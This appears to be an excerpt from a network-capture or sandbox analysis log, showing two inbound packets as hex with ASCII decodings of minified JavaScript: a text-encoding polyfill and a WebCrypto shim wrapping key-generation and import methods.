2025-01-15 14:12:13 UTC	1369	IN	Data Raw: 70 72 6f 74 6f 74 79 70 65 2c 22 65 6e 63 6f 64 69 6e 67 22 2c 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 65 6e 63 6f 64 69 6e 67 2e 6e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 7d 29 2c 42 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 74 3d 74 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 22 22 3a 53 74 72 69 6e 67 28 74 29 2c 65 3d 79 28 65 29 2c 74 68 69 73 2e 5f 64 6f 5f 6e 6f 74 5f 66 6c 75 73 68 7c 7c 28 74 68 69 73 2e 5f 65 6e 63 6f 64 65 72 3d 45 5b 74 68 69 73 2e 5f 65 6e 63 6f 64 69 6e 67 2e 6e 61 6d 65 5d 28 7b 66 61 74 61 6c 3a 22 66 61 74 61 6c 22 3d 3d 3d 74 68 69 73 2e 5f 66 61 74 61 6c 7d 29 29 2c 74 68 69 73 2e 5f 64 6f 5f 6e 6f 74 5f 66 6c Data Ascii: prototype,"encoding",{get:function(){return this._encoding.name.toLowerCase()}}),B.prototype.encode=function(t,e){t=t===undefined?"":String(t),e=y(e),this._do_not_flush\|\|(this._encoder=E[this._encoding.name]({fatal:"fatal"===this._fatal})),this._do_not_fl
2025-01-15 14:12:13 UTC	1369	IN	Data Raw: 49 68 76 63 4e 41 51 45 42 3a 22 31 2e 32 2e 38 34 30 2e 31 31 33 35 34 39 2e 31 2e 31 2e 31 22 7d 2c 63 3d 7b 22 31 2e 32 2e 38 34 30 2e 31 31 33 35 34 39 2e 31 2e 31 2e 31 22 3a 22 4b 6f 5a 49 68 76 63 4e 41 51 45 42 22 7d 3b 69 66 28 5b 22 67 65 6e 65 72 61 74 65 4b 65 79 22 2c 22 69 6d 70 6f 72 74 4b 65 79 22 2c 22 75 6e 77 72 61 70 4b 65 79 22 5d 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 69 5b 74 5d 3b 69 5b 74 5d 3d 66 75 6e 63 74 69 6f 6e 28 72 2c 6f 2c 6c 29 7b 76 61 72 20 63 2c 68 2c 75 2c 70 2c 77 3d 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 3b 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 22 67 65 6e 65 72 61 74 65 4b 65 79 22 3a 63 3d 79 28 72 29 2c 68 3d 6f 2c 75 3d 6c 3b 62 Data Ascii: IhvcNAQEB:"1.2.840.113549.1.1.1"},c={"1.2.840.113549.1.1.1":"KoZIhvcNAQEB"};if(["generateKey","importKey","unwrapKey"].forEach((function(t){var n=i[t];i[t]=function(r,o,l){var c,h,u,p,w=[].slice.call(arguments);switch(t){case"generateKey":c=y(r),h=o,u=l;b